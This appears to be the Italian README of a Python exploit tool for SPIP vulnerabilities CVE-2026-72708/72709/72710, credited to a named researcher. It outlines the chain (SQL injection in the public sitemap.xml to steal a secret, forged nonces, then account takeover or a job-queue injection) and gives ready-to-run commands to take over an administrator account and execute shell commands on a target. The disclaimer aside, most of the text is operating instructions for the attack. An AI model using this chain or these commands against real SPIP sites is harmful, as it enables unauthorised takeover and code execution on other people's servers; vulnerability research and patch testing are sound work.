
Catena di exploit Python per le CVE SPIP 2026-72708/72709/72710, che concatena SQL injection non autenticata fino all'acquisizione dell'account e all'esecuzione di codice in remoto.
Exploit per CVE-2026-72708, CVE-2026-72709 e CVE-2026-72710 scoperto da Franck Chevalier (Wayko)
Per un'analisi tecnica completa, leggi l'articolo completo sul blog di Lexfo.
Questo repository è fornito esclusivamente a scopo di ricerca e sicurezza difensiva. L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni.
Il punto di ingresso è un'SQL injection nella pagina pubblica sitemap.xml per estrarre alea_ephemere.
Con quel segreto, è possibile forgiare nonce validi per azioni anonime.
Da lì, due azioni portano all'RCE:
action=editer_auteur account takeover, poi RCE dall'area privata.action=editer_objet mass assignment, per scrivere una riga nella coda spip_jobs, poi eseguirla tramite action=cron.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
Prima di sovrascrivere, --ato estrae il login del target e l'hash pass corrente
(tramite l'SQLi) così puoi ripristinarli in seguito con --restore-hash:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
Il file verrà scritto in IMG/casse-spip_<token>.html.